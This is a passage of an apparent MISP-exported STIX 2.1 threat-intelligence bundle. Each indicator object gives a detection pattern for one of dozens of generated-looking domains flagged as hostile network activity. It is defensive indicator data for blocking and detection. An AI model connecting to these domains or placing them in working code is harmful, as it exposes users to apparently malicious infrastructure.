"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c1b-5184-4bbc-a01f-465f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babgohbab.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c1b-62dc-423a-b57b-4ca5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babgrabbab2.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c1c-5ca8-4e74-bf96-4835950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babgrebbab.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c1d-4754-4326-ac43-472e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babgrebbab2.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c1e-2920-450d-bffc-478c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babgrehbab.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c1f-5308-4498-8654-48e9950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babgribbab.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c20-5828-4a82-96ae-4844950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babgrihbab.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c21-8f94-4f32-9396-4e0d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babgrohbab.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c22-90e0-4866-9047-4933950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babgrulbab.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c22-5398-4400-a0fa-4e6e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babgulbab.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c23-7194-40f5-bbee-4bda950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babhabbab2.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c24-74d0-4821-add1-421a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babhebbab.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c25-d034-4b82-a96c-48bf950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babhebbab2.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c26-2834-4d32-9acf-4a17950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babhibbab2.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c27-6e98-4708-855d-4404950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babhihbab.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c28-9624-4269-a672-4d07950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babhohbab.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c29-f03c-48a5-858c-427b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babhulbab.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c2a-2ef0-436b-81fc-4b08950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babjabbab2.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c2a-ce64-4410-a3ce-428e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babjebbab.ru']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c2b-40f8-4108-b9d8-49d7950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babjebbab2.ru']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c2c-5934-4ba8-8711-4e33950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babjibbab2.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c2d-1b64-41ee-b8b7-4bd1950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babjihbab.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c2e-ad84-42d4-b7c1-4463950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babjohbab.host']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c2f-0420-48aa-8bf2-4aa0950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babjulbab.host']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c30-3f68-4938-b307-4026950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babkabbab2.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c31-d7bc-4903-8c28-41d1950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babkebbab.ua']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c31-c78c-416d-a0bd-4669950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babkebbab2.ua']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c32-564c-44fe-a020-471a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babkehbab.host']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c33-ad34-4e29-903c-42ea950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babkibbab2.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c34-6d8c-4872-be75-4e31950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babkihbab.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c35-51d4-49ce-821d-4b0c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babkohbab.top']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c36-2c94-4e60-bcbf-47ab950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babkulbab.top']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c37-4858-438a-a957-464a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'bablabbab2.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c38-f7c0-4509-ab4f-4a8d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'bablebbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c38-dcb0-40f1-8a2e-44ff950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'bablebbab2.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
